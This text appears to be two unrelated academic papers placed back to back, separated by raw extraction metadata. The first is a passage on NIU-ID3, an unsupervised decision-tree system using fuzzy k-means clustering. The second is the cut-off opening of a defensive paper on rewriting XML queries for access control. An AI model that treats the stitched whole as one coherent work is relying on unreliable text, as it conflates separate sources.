### 6.2 System Design We will demonstrate the design and implementation of our system, which is a new implementation of the ID3 algorithm to make it work in unsupervised manner by building a font-end to it. Our system is called New Implementation of Unsupervised ID3 (NIU-ID3). We will also give an overview of the over all architecture of the NIU-ID3, the tasks that the system can deal with, the data format that it uses and the results that is produced from it. The NIU-ID3 system accomplishes its task via several stages that are executed in a serial fashion in the form of a wizard form (Data Mining Wizard). These stages are grouped into four main components: - Data set is the data to be used to discover knowledge from. - Preprocessing is the process of preparing the data for classification if the data is continuous or unlabeled. - Classification is the classification process (ID3 algorithm) to produce the knowledge. - Knowledge is the results discovered by classification process. The NIU-ID3 system can manipulate with two types of data files; that is a text data or Access databases. It can also preprocess unlabeled data (clustering of data objects) and process label data (classification). Our system can discover knowledge into two different formats, namely; decision trees and classification rules. Building a NIU-ID3 model: The model building phase can start by building a simulated model of the problem. This model will provide a clear understanding of the problem in question. From the literature, there are three perspectives used in the development of simulated models and these are: - Use some Graphical User Interface (GUI) tools to develop the simulated model on the screen. Use arcs to connect the system components to create the logical model and the run simulated model. “In most cases, due to the limitation of the simulation program under use, some simplifications and approximations to the model may be required. Such simplifications or approximations can be very costly.” [20]. - Support the belief that any simulation program would not be able to model all tasks of systems without the need to make some modification. “This suggests that models should be developed from scratch by using a simulation modeling language.” [20]. This approach may increase the time needed to produce the system and may divert the developer to pay more attention to the programming challenges than understanding the system. - Focuses on the use of GUI that will automatically generate code with the possibility of the developer intervention to make some changes to the code to match the system requirements. This is a very popular practice because it reduces the need time to produce the system, on the other hand code modification is a tedious task. Figure-2: General architecture of NIU-ID3 system. Figure-3: Build process of the NIU-ID3 system. The model building phase consists of a number of steps, as follows: 1. Data loading which consists of two sub steps: - In loading data, our system deals with two types of data files; text files data and Access database files. Our system will ask the user to select the file type. The system initially designed to deal with only Access database files, so if the loaded data is not Access database file then a preprocessing step will be converted it to Access database file. So, the loaded database is called the training set. This data set consists of a set of tuples, each tuple consists of a number of values and an additional attribute called class attribute. At this stage by the use of ADO.NET technique to establish the connection between the database and the system. The ADO.NET is a part of the base class library that is included with the Microsoft .NET framework, and it is a set of computer software components that can be used by programmers to access the data. In reality, ADO.NET can not be connected with data sources directly, but it needs .NET data providers. Here we use OLE DB.NET data provider, and Microsoft® universal data access component 2.5 or 2.6 (MDAC 2.5 or MDAC 2.6). - The data selection sub step will display all table's names that are available of type Access to the user, so he/she can select one of them and the system starts the discovery process. There are some conditions on the data file that is loaded to our system. We will explain them in the next chapter. 2. Preprocessing: consists of four sub steps: - Check missing values: if there are some missing values in the loaded data our system will ask the user to change the data file due to the fact that the system is not accommodated to deal with missing values. - Converting a text file to Access database file: If the loaded data file is of type text, the system will convert it into an Access database file. - Data labeling: if the loaded data is un-labeled then the system will label it via the clustering component of the system. - Continuous and discrete valued attributes: The ID3 does not work with continuous valued attributes. If the number of values per attribute is more than four then the system will divide the range of attribute values into intervals using the length equation. 3. Classification is the process of building a model or a function that can be used to predict the class of unclassified data objects. In our system we use the ID3 algorithm for this task. 4. Knowledge is the end result that is produced from our system. The end result can be in one of different form such as; decision tree, decision rules or more general simplified rules. In our system the end results can be saved in text files if the user desire along with the data. 7 Clustering Front-End module The goal of NIU-ID3 system is to build a decision tree and to extract classification rules (decision rules) from the provided data set. Such rules can be used for prediction. The classification module of our system (ID3 algorithm) needs a labeled data set to train the classifier. Such data set consists of a number of records, each of which consists of several attributes. Attributes values will be dealt with accordingly. There is one distinguished attribute called the dependent (class) attribute. In the case of un-labeled data, the clustering module will be used to carry out the labeling process. In this chapter we will focused or concerned on an one algorithm of clustering techniques, which called fuzzy k-means algorithm (extension of the normal k-means clustering method), and its software package, which called “FuzME program” to make it as a Front-End module to our system. 7.1 Clustering methods In general, clustering is the process of grouping data objects into groups or clusters such that: - Each group or cluster is homogeneous or compact with respect to certain characteristics. That is, objects in each group are similar to each other. - Each group should be different from other groups with respect to the same characteristics; that is, objects of one group should be different from the objects of other groups. Clustering is an unsupervised learning technique used to divide data sets into groups or clusters. These clusters can be viewed as a group of elements which are more similar to each other than elements belonging to other groups. An alternative definition of a cluster is a region with a relatively high density of points, separated from other clusters by a region with a relatively low density of points. "Clustering is a useful technique for the discovery of some knowledge from a dataset. It maps a data item into one of several clusters, where clusters are natural groupings of data items based on similarity metrics or probability density models. Clustering pertains to unsupervised learning, when data with class labels are not available." [21]. In general, data clustering algorithms can be categorized as hierarchical or partitioning. Hierarchical algorithms find successive clusters using previously established clusters, whereas partitioning algorithms finds all clusters at once. Our system clustering algorithm: As it has been mentioned previously, our system works in unsupervised fashion which needs to label unlabeled data before it can generate the knowledge in the form of decision tree. To label unlabeled data, our system uses a program called FuzME which based on the clustering algorithm called fuzzy k-means algorithm. **Fuzzy k-means algorithm**: In fuzzy clustering, each data object has a degree of belonging in each cluster. So each data object belongs to all clusters with varying degree of membership. Thus, data objects on the edge of a cluster belong to the cluster with lesser degree than data objects that are in the center of the cluster. In fuzzy K-means clustering, the centroid of a cluster is the average weight of the degree of belonging to the cluster. "Fuzzy-k-means clustering is an extension of the normal, crisp-k-means clustering method to account for uncertainties associated with class boundaries and class membership. As in k-means clustering, the iterative procedure minimizes the within-class sum of squares, but each object (or cell on a map) is assigned a continuous class membership value ranging from 0 to 1 in all classes, rather than a single class membership value of 0 or 1 used in the normal k-means clustering method (DeGrujijter and McBratney, 1988). Fuzzy-k-means clustering was conducted using the FuzME program (Minasny and McBratney, 2002) with Mahalanobis distance and a fuzzy exponent of 1.2. Each cell was assigned to a single yield category based on the highest fuzzy membership value at this particular location."[22]. **FuzME program**: In our system NIU-ID3 uses FuzME program (based on Fuzzy k-means algorithm) as front-end module to label unlabeled data objects. FuzME program was published and presented by Minasny B. and McBratney A. in the year of 2002 from the Australian Centre for Precision Agriculture (ACPA) at the University of Sydney, Australia. More information about the program can found on the following web site http://www.usyd.edu.au/su/agric/acpa. **Input to FuzME program**: According to [23], the data file that can be accepted as input to FuzME program must be in text format, where the first row must be start with the word "id" followed by attributes names. The second and consecutive rows start with the id as a number for each data object followed by the values of the attributes separated by a single space. As an example, figure-4, depicts an input to the FuzME program. The data file consists of 14 instances, each of which consists of four attributes. <table> <thead> <tr> <th>Id</th> <th>Outlook</th> <th>Temperature</th> <th>Humidity</th> <th>Wind</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Sunny</td> <td>Hot</td> <td>High</td> <td>Weak</td> </tr> <tr> <td>2</td> <td>Sunny</td> <td>Hot</td> <td>High</td> <td>Strong</td> </tr> <tr> <td>3</td> <td>Overcast</td> <td>Hot</td> <td>High</td> <td>Weak</td> </tr> <tr> <td>4</td> <td>Rain</td> <td>Mild</td> <td>High</td> <td>Weak</td> </tr> <tr> <td>5</td> <td>Rain</td> <td>Cool</td> <td>Normal</td> <td>Weak</td> </tr> <tr> <td>6</td> <td>Rain</td> <td>Cool</td> <td>Normal</td> <td>Strong</td> </tr> <tr> <td>7</td> <td>Overcast</td> <td>Cool</td> <td>Normal</td> <td>Strong</td> </tr> <tr> <td>8</td> <td>Sunny</td> <td>Mild</td> <td>High</td> <td>Weak</td> </tr> <tr> <td>9</td> <td>Sunny</td> <td>Cool</td> <td>Normal</td> <td>Weak</td> </tr> <tr> <td>10</td> <td>Rain</td> <td>Mild</td> <td>Normal</td> <td>Weak</td> </tr> <tr> <td>11</td> <td>Sunny</td> <td>Mild</td> <td>Normal</td> <td>Strong</td> </tr> <tr> <td>12</td> <td>Overcast</td> <td>Mild</td> <td>High</td> <td>Strong</td> </tr> <tr> <td>13</td> <td>Overcast</td> <td>Hot</td> <td>Normal</td> <td>Weak</td> </tr> <tr> <td>14</td> <td>Rain</td> <td>Mild</td> <td>High</td> <td>Strong</td> </tr> </tbody> </table> Figure-4: Text file format present to FuzME program. **Output to FuzME program**: The execution of the FuzME program will generate in many text files as a result (output). The produced text files are: number of files each of them is named as n_class, where n is the number of produced (i.e. 2_class.txt, 3_class.txt, 4_class.txt, 5_class.txt, etc ...), number of files each of them is named as n_dscr that contains description of the produced clustering files (i.e. 2_dscr.txt, 3_dscr.txt, 4_dscr.txt, 5_dscr.txt, etc ...), Control, FuzMeout, pca, and summary. Our system needs only to use only one n_class depending on the number of classes the number of cluster that the user had specified. The output file of the FuzME program is a text file that consists of each object and which cluster that the data object falls in. For example the output text file depicted in figure-5, is the result from executing the FuzME program on the data of figure-4 and the desired number of cluster is 2, which are coded as 2a and 2b respectively. So the output file name is 2_class.txt. So, our system needs only to use the second (class) and add it to the original data text file as depicted in figure-6 to be used as input to the system. Front-End module Implementation: In our system, we link the FuzME program with the implementation of the ID3 algorithm by a shell function, which is considered as a technique of vb.net 2005 used to access to link external objects. "A Shell link is a data object that contains information used to access another object in the Shell's namespace that is, any object visible through Microsoft Windows Explorer. The types of objects that can be accessed through Shell links include files, folders, disk drives, and printers. A Shell link allows a user or an application to access an object from anywhere in the namespace."[24]. The external object that can be accessed or linked to must reside on the current computer disk drives. 8 Experiments and results The purpose of this study is to produce different forms of knowledge and to implement the ID3 algorithm in supervised and unsupervised fashion using Visual Basic.net 2005. In this paper, we demonstrate the obtained results of applying our system to different types and sizes of data from a variety of domains. To test the effectiveness of our system, we have conducted some experiments using many real data sets (databases). We used real data in the experiments that available on public domain (the Internet). All of our experiments are performed on a PC with Microsoft Windows XP professional operating system (service pack 2) with a processor speed of 2.7 GHz, RAM size of 512MB and hard disk of size 80 GB. The PC computer is also equipped with Microsoft® Universal Data Access Component 2.5 or 2.6 (MDAC 2.5 or MDAC 2.6) also a reference to Microsoft® Service Component OLEDB Service Component 1.0 stored as; “C:\Program Files\Common Files\System\OLE DBoledb32.dll. Since our system works with Access database and with text files after some preprocessing in converting the text files into Access database files. Then the actual loading of the data to the system can take place. Access database file: the Access database file name can be numerical or symbolic, and it must be consists of at least one relational table and the name of the relational table can be numerical or symbolic. The relational table, as depicted in figure-7, consists of number of tuples, each of which has number of attributes. The type of attributes can be numeric or symbolic discrete or continuous. Numerical attribute values can be real or integer. Each attribute must have a value, so no missing values are allowed. A symbolic attribute value can be symbols, numbers or both of them. Each tuple corresponds to one instance (example). Text file specifications: The text file name accepted by our system can be numerical or symbolic, and it can consist of any type of data (numerical or symbolic). Each text file consists of number of rows or lines as depicted in figure-8. The first line consists of the attribute names. The second line and subsequent ones consist of the data. The data values can be of any type (i.e. numerical or symbolic). A numerical attribute values can be real or integer. A symbolic attribute value can be symbols, numbers or both. The values in each row must be separated by one space. Each row corresponds to one example or instance and it consists of the values of the attributes. Also, here no missing values are allowed. Figure-8: Text file format. Our experiments: We have conducted a total of 8 experiments with different data sets. The differences in the data sets are in data types and sizes. The results of these experiments are summarized in table-3 as follow: <table> <thead> <tr> <th>Experiment No.</th> <th>Data set name</th> <th>Data type</th> <th>Data labeled or unlabeled</th> <th>No. of tuples</th> <th>No. of attributes including class attribute</th> <th>No. of tree levels</th> <th>No. of decision rules</th> <th>No. of simplified rules</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Play tennis</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>14</td> <td>5</td> <td>3</td> <td>5</td> <td>2</td> </tr> <tr> <td>2</td> <td>Club membership</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>12</td> <td>5</td> <td>2</td> <td>2</td> <td>2</td> </tr> <tr> <td>3</td> <td>Stock market</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>10</td> <td>4</td> <td>3</td> <td>4</td> <td>2</td> </tr> <tr> <td>4</td> <td>London stock market</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>6</td> <td>6</td> <td>3</td> <td>3</td> <td>2</td> </tr> <tr> <td>5</td> <td>Titanic</td> <td>Symbolic/ discrete</td> <td>Labeled</td> <td>2201</td> <td>4</td> <td>3</td> <td>5</td> <td>2</td> </tr> <tr> <td>6</td> <td>Iris</td> <td>Symbolic/ continuous/ numerical</td> <td>Labeled</td> <td>150</td> <td>5</td> <td>3</td> <td>9</td> <td>3</td> </tr> <tr> <td>7</td> <td>Unlabeled play tennis</td> <td>Symbolic/ discrete</td> <td>Unlabeled</td> <td>14</td> <td>1</td> <td>3</td> <td>4</td> <td>2</td> </tr> <tr> <td>8</td> <td>Unlabeled Titanic</td> <td>Symbolic/ discrete</td> <td>Unlabeled</td> <td>2201</td> <td>3</td> <td>2</td> <td>4</td> <td>2</td> </tr> </tbody> </table> Table-3: Summary of the experiments results. Depending on the obtained results from our system, the author would like to make the following remarks: 1. The results obtained from all experiments giving us decision trees with three levels, because we used discretization techniques to reduce the number of values per attribute to 4. 2. The results obtained from experiments no. 1, 2, 3 and 4 are the same results as in [8, 9, 12, 13, 15, 16, 17, 18, and 19]. 3. We had no previous results for experiment no. 5, so we could not compare it with previous ones and we think that this result is satisfactory depending on the accurate results that we have obtained in experiments 1 to 4. 4. For experiment no. 6, there were some differences between our results and the results published in [25, 26 and 27]. The differences in results could be due to: - The discretization (normalization) technique used in [25]. - C4.5 (classification) algorithm and the discretization (normalization) technique used in [26 and 27]. 5. The results obtained from experiments no. 7 and 8 are different from the ones published in experiments no. 1 and 5, this could be due to the labeling process via the use of FuzMe Program. 9 Conclusion In this paper, we have added a front-end to the ID3 algorithm, so it works in unsupervised mode. Generally, our system consisted of two parts: the first part is the implementation of the ID3 algorithm to be used in classifying labeled data sets; the second part is used to label the unlabeled data sets using FuzMe Program. Our system, NIU-ID3 has been tested with a number of different data sets (labeled, unlabeled and different data types and sizes). We believe that our system will enable decision makers such as; managers, analysts, engineers, physicians, etc... to take the correct decisions. From our system's results, we can conclude that: 1. Our system has produced very accurate results such as the ones in experiments 1, 2, 3, and 4. 2. The decision trees produced by our system were very clear to visualize. 3. The rules produced by our system were simple to understand and clear to visualize. 4. We think that the results we obtained for experiment no. 5 is satisfactory. 5. The differences in results of experiment 6, with the original results from [25, 26 and 27] could be due to the discretization techniques used and the difference in the classification algorithm or the labeling process such as experiment 7 and 8. References: [27] Xue Li. A Tutorial on Induction of Decision Trees, School of information technology and electrical engineering, tutorial, University Of Queensland, 2002.
{"Source-Url": "http://www.wseas.us/e-library/conferences/2009/baltimore/DNCOCO/DNCOCO-11.pdf", "len_cl100k_base": 11744, "olmocr-version": "0.1.49", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 41164, "total-output-tokens": 13468, "length": "2e13", "weborganizer": {"__label__adult": 0.0003452301025390625, "__label__art_design": 0.0005311965942382812, "__label__crime_law": 0.0005331039428710938, "__label__education_jobs": 0.00731658935546875, "__label__entertainment": 9.125471115112303e-05, "__label__fashion_beauty": 0.0002410411834716797, "__label__finance_business": 0.0006809234619140625, "__label__food_dining": 0.0004696846008300781, "__label__games": 0.0008153915405273438, "__label__hardware": 0.001506805419921875, "__label__health": 0.0009241104125976562, "__label__history": 0.0004837512969970703, "__label__home_hobbies": 0.00024390220642089844, "__label__industrial": 0.0010652542114257812, "__label__literature": 0.0004055500030517578, "__label__politics": 0.0003342628479003906, "__label__religion": 0.0005245208740234375, "__label__science_tech": 0.2900390625, "__label__social_life": 0.00016546249389648438, "__label__software": 0.025543212890625, "__label__software_dev": 0.66650390625, "__label__sports_fitness": 0.000335693359375, "__label__transportation": 0.0006175041198730469, "__label__travel": 0.0002218484878540039}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54388, 0.03296]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54388, 0.75896]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54388, 0.89023]], "google_gemma-3-12b-it_contains_pii": [[0, 3735, false], [3735, 8281, null], [8281, 12904, null], [12904, 17440, null], [17440, 22789, null], [22789, 25885, null], [25885, 28896, null], [28896, 31601, null], [31601, 35434, null], [35434, 40195, null], [40195, 43125, null], [43125, 48150, null], [48150, 51776, null], [51776, 54388, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3735, true], [3735, 8281, null], [8281, 12904, null], [12904, 17440, null], [17440, 22789, null], [22789, 25885, null], [25885, 28896, null], [28896, 31601, null], [31601, 35434, null], [35434, 40195, null], [40195, 43125, null], [43125, 48150, null], [48150, 51776, null], [51776, 54388, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54388, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54388, null]], "pdf_page_numbers": [[0, 3735, 1], [3735, 8281, 2], [8281, 12904, 3], [12904, 17440, 4], [17440, 22789, 5], [22789, 25885, 6], [25885, 28896, 7], [28896, 31601, 8], [31601, 35434, 9], [35434, 40195, 10], [40195, 43125, 11], [43125, 48150, 12], [48150, 51776, 13], [51776, 54388, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54388, 0.17097]]}
olmocr_science_pdfs
2024-11-27
2024-11-27
de5b04a127eadeb05e443463bcca8d4e335b77e4
[REMOVED]
{"len_cl100k_base": 12278, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 48794, "total-output-tokens": 14948, "length": "2e13", "weborganizer": {"__label__adult": 0.0002963542938232422, "__label__art_design": 0.00043392181396484375, "__label__crime_law": 0.0003180503845214844, "__label__education_jobs": 0.0008368492126464844, "__label__entertainment": 0.00010228157043457033, "__label__fashion_beauty": 0.00015532970428466797, "__label__finance_business": 0.000286102294921875, "__label__food_dining": 0.00035572052001953125, "__label__games": 0.0011157989501953125, "__label__hardware": 0.0010232925415039062, "__label__health": 0.0004229545593261719, "__label__history": 0.0003056526184082031, "__label__home_hobbies": 0.00011795759201049803, "__label__industrial": 0.000507354736328125, "__label__literature": 0.0002772808074951172, "__label__politics": 0.00031447410583496094, "__label__religion": 0.0004353523254394531, "__label__science_tech": 0.0732421875, "__label__social_life": 0.00010329484939575197, "__label__software": 0.01230621337890625, "__label__software_dev": 0.90625, "__label__sports_fitness": 0.0002994537353515625, "__label__transportation": 0.0005402565002441406, "__label__travel": 0.0002191066741943359}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 53463, 0.03]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 53463, 0.31787]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 53463, 0.86096]], "google_gemma-3-12b-it_contains_pii": [[0, 4449, false], [4449, 9780, null], [9780, 14007, null], [14007, 18722, null], [18722, 23720, null], [23720, 28332, null], [28332, 31404, null], [31404, 35657, null], [35657, 40063, null], [40063, 43840, null], [43840, 48648, null], [48648, 53463, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4449, true], [4449, 9780, null], [9780, 14007, null], [14007, 18722, null], [18722, 23720, null], [23720, 28332, null], [28332, 31404, null], [31404, 35657, null], [35657, 40063, null], [40063, 43840, null], [43840, 48648, null], [48648, 53463, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 53463, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 53463, null]], "pdf_page_numbers": [[0, 4449, 1], [4449, 9780, 2], [9780, 14007, 3], [14007, 18722, 4], [18722, 23720, 5], [23720, 28332, 6], [28332, 31404, 7], [31404, 35657, 8], [35657, 40063, 9], [40063, 43840, 10], [43840, 48648, 11], [48648, 53463, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 53463, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
cd69030b8a9541c80a1a532239a26961ba09c7db
A Schema Based Approach to Valid XML Access Control CHANGWOO BYUN1 AND SEOG PARK2 1Department of Computer Systems and Engineering Inha Technical College Incheon, 402-752 Korea 2Department of Computer Science and Engineering Sogang University Seoul, 121-742 Korea As Extensible Markup Language (XML) is becoming a de facto standard for the distribution and sharing of information, the need for an efficient yet secure access of XML data has become very important. An access control environment for XML documents and some techniques to deal with authorization priorities and conflict resolution issues are proposed. Despite this, relatively little work has been done to enforce access controls particularly for XML databases in the case of query access. This work presents an approach to enforce authorizations on XML documents via a filtering system transforming a user query into a rewritten safe query. The basic idea utilized is that a query interaction with only necessary access control rules is modified to an alternative form, which is guaranteed to have no access violations using the metadata of XML schemas and set operations supported by XPath 2.0. This access control mechanism is independent from the underlying XML database engine. Thus, it could be built on top of any XML DBMS, or work as stand-alone services. This work includes other several benefits such as implementation ease, small execution time overhead, and fine-grained controls. The experimental results clearly demonstrate the efficiency of the approach. Keywords: XML data, XML schema, valid XML access control, access control mechanism, query rewriting 1. INTRODUCTION As XML [1] is becoming a de facto standard for the distribution and sharing of information, several schemes for XML access control have been proposed. They can be classified in two major categories: view-based node filtering and non view-based query rewriting techniques. View-based schemes [2-9], suffer from high maintenance and storage costs. To remedy these shortcomings researchers are seeking non view-based query rewriting schemes. Some pre-processing mechanisms have been proposed, such as Static Analysis [10], QFilter [11, 12], and Security View [13, 14]. The advantage of pre-processing methods is that they are independent from the underlying XML database engine, and thus could be built on top of any XML DBMS, or work as stand-alone services. Despite this, relatively little work has been done to enforce access controls particularly for XML databases in the case of query access. Developing an efficient mechanism for XML databases to control query-based access is therefore the central theme of this paper. We implemented the Secure Query Filter (SQ-Filter) system, which places the focus on the abstraction of only necessary access control rules and the query modification. The abstraction of necessary access rules necessitates the development of an effective and efficient choosing mechanism that abstracts only the ones appropriate to a user query. The traditional access control enforcement mechanism for XML documents uses all access control rules corresponding to a query requestor. The basic notion pursued is one of encoding trees. The SQ-Filter system uses the PRE (order) and POST (order) ranks of access control rules and queries to map each (PRE, POST) onto a two-dimensional plane, for instance, the PRE/POST plane. The finding of necessary access control rules is then reduced to process a part of regions in this PRE/POST plane. Query modification is the development of an efficient query rewriting mechanism that transforms an unsafe query into a safe yet correct one that keeps the user’s access control policies. Rewriting the query early on will reduce query processing overhead to retrieve the allowed set of XML sub-trees as compared to retrieving and testing. In NFA approaches [10-12], without the metadata of the XML Schema (DTD), the process of rewriting queries may be particularly slower and incorrect because more states are being traversed to process “*” and “//”. The basic notion pursued is DTD labeling and a simple label comparison. A “*” node is unnecessary if the DTD shows an actual node from the node (i.e., parent node) before “*” to the node (i.e., child node) after “*”. In addition, the “//” axis is also unnecessary if the DTD shows that there is a single path from the node before “//” to the node after “//”. If so, the “//” axis is replaced with the deterministic sequence of “/” steps. It is a very important factor to prohibit the query rewriting processor from making an incorrect query. We conducted an extensive experimental study which shows that the SQ-Filter system improves access decision time and generates a more exact rewritten query. The rest of the paper is organized as follows: Section 2 briefly reviews related works and describes their weaknesses. Section 3 briefly reviews background knowledge on the topic at hand, which consists of the semantics of a valid XML, the role of XPath expression in access control rules, access control polices, definition of secure query rewriting in XML access control, and PRE/POST structure. Section 4 introduces the architecture of the SQ-Filter system, which runs three components. These are the QUERY ANALYZER component which acquires information from a query, the ACR FINDER component which plays an important role in eliminating all the unnecessary access control rules for a query, and the QUERY EXECUTOR component which makes a safe rewritten query by extending/eliminating query tree nodes and combining a set of nodes by the set operations. In section 5, we prove the correctness of the SQ-Filter system. Section 6 presents the results of our experiments, which reveal the effective performance of the SQ-Filter system. Finally, section 7 summarizes our work. 2. RELATED WORK The authorizations for XML documents should be associated with protection objects at different granularity levels. In general, existing XML access control models assume access control rules, which are identified as quintuple (Subject, Object, Access-type, Sign, and Type) [2-9]. The subject refers to the user or user group with authority, the object pertains to an XML document or its specific portion, access-type means the kind of operations, the sign could either be positive (+) or negative (−), and the type shows “R(ecursive)” or “L(ocal).” In the studies of E. Damiani et al. [2, 3], E. Bertino et al. [4-6], A. Gabilon and E. Bruno [7], and C. Farkas et al. [8, 9], the object part of access control rule is associated with each XML document/DTD. Because of the hierarchical nature of XML, the notion of scope of an access control rule is introduced in most of the current approaches. The scope can be (i) the node only, (ii) the node and its attributes, (iii) the node and its text node children, and (iv) the node, its attributes, all its descendants and their attributes. If the scope of a rule is (i) or (ii), then the rule is called L(ocal). If its scope is (iii) or (iv), it is called R(ecursive). The traditional XML access control enforcement mechanism [2-9] as mentioned above is a view-based enforcement mechanism. W. Fan et al. [13, 14] introduced a virtual security view mechanism, which is provided to a user as a view DTD and is used for query-rewriting. The security view, however, is based on the user and not the query. Thus, a query-rewriting algorithm made use of unnecessary parts in a security view. It provides a useful algorithm for computing the view using tree labeling. However, aside from its high cost and maintenance requirement, this algorithm is also not scalable for a large number of users. To remedy this view-based problem, M. Murata et al. [10] simply focused on filtering out queries that do not satisfy access control policies. J. M. Jeon et al. [15] proposed the access control method that produces the access-granted XPath expressions from the query XPath expression by using access control tree (XACT), where the edges are a structural summary of XML elements, and the nodes contain access control XPath expressions. Since XACT includes all users' access control rules, it is very complicated and leads to computation time overhead. B. Luo et al. [11] and P. Ayyagari et al. [12] took extra steps to rewrite queries in combination with related access control policies before passing these revised queries to the underlying XML query system for processing. However, the shared Nondeterministic Finite Automata (NFA) involves many unnecessary access control rules from the query point of view, which further result in a time-consuming decision during which the query should have already been accepted, denied, or rewritten. In addition, this approach is very inefficient for rewriting queries with the descendant-or-self axis (“//”) because of the exhaustive navigation of NFA. The many queries on XML data have path expressions with “//” axes because users may not be concerned with the structure of data and intentionally make path expressions with “//” axes to get the intended results. W. Fan et al. [14] and E. Damiani [17] focused on Deterministic Finite Automaton (DFA) based query rewriting approach for avoiding the many backtrackings inherent to NFAs and resolving the original schema disclosure. Although DFA approaches are theoretically efficient, there are no experimental results. 3. PRELIMINARY We review background knowledge on the topic at hand, which consists of the semantics of a valid XML, the role of XPath expression in access control rules, access control polices, and PRE/POST structure which is the metadata of the SQ-filter system. 3.1 XML An XML document consists of elements, attributes, and text nodes. These elements collectively form a tree. The content of each element is a sequence of elements (nested elements) or text nodes. An element has a set of attributes, each of which has a name and a value. Attributes provide additional information on elements, and thus increasing the semantics one can specify for elements. XML specification [1] defines two types of document: well-formed and valid ones. A well-formed document must conform to the three rules. Valid documents, on the other hand, should not only be well formed but should also have a Document Type Definition (DTD) or XML Schema, which the well-formed document conforms to. If several people are requiring query using XPath or XQuery, the query structure must conform to DTD or the XML Schema structure. In this work, we considered a valid XML with a DTD. 3.2 XPath Expression and Access Control Rule XPath is a path expression language of a tree representation of XML documents. A typical path expression consists of a sequence of steps. Each step works by following a relationship between nodes in the document: child, attribute, ancestor, descendant, etc. Any step in a path expression can also be qualified by a predicate, which filters the selected nodes. Meanwhile, XPath 2.0 [18] supports operations (i.e., UNION, INTERSECT, and EXCEPT) that combine two sets of node. Although these operations are technically non-path expressions, they are invariably used in conjunction with path expressions so they are useful in transforming unsafe queries into safe ones. To enforce the fine-level granularity requirement, authorization models for regulating access to XML documents use XPath which is a suitable language for both query processing and the object part of an XML access control authorization. 3.3 Access Control Policies In general, some hierarchical data models (e.g., Object-Oriented Data Model, XML Data Model, etc.) exploit the implicit authorization mechanism combining positive and negative authorizations [19]. “Open policy” grants a query for a node whose access-control information is not defined. “Closed policy,” on the other hand, denies a query for a node whose access-control information is not defined. A Positive/Negative authorization mechanism for the closed policy generally assumes that a subject has a null authorization on every object until explicitly authorized. For the strict data security, we used “most specific precedence” for the propagation policy, “denials take precedence” for the conflict resolution policy, and “closed policy” for decision policy to keep the data safe. The combination of negative authorization with positive authorizations allows the definition of positive authorizations as exceptions to negative authorization at a higher level in granularity hierarchy. M. Murata et al. [10] called this combination as “valid read accessibility views.” Similarly, the combination of a positive authorization with a negative one specifies exceptions to a positive authorization. This approach leads to two problems, the so-called “invalid read accessibility views.” In this paper, we chose “valid read accessibility views.” To ensure that an access control policy is “valid read accessibility views” in a positive/negative authorization mechanism, we proposed a new concept of generating access control rules. We defined this as “Integrity Rule of Access Control Rules.” **Definition 1 [Integrity Rules of ACRs]** It is impossible for any node, which is not in the scope of positive ACR (Access Control Rule(s), to have negative ACRs. ### 3.4 PRE/POST Structure An XPath expression [18] declares the query requirement by identifying the node of interest via the path from the root of the document to the elements which serve as the root of the sub-trees to be returned [20]. The QFilter [11] defines these semantics as “answer-as-sub-trees.” We call the root of sub-trees to be returned as target node. **Definition 2 [Target Node]** A target node of a given XPath is the last node except for the predicates. For example, the target node of an XPath, /site/people/person is a 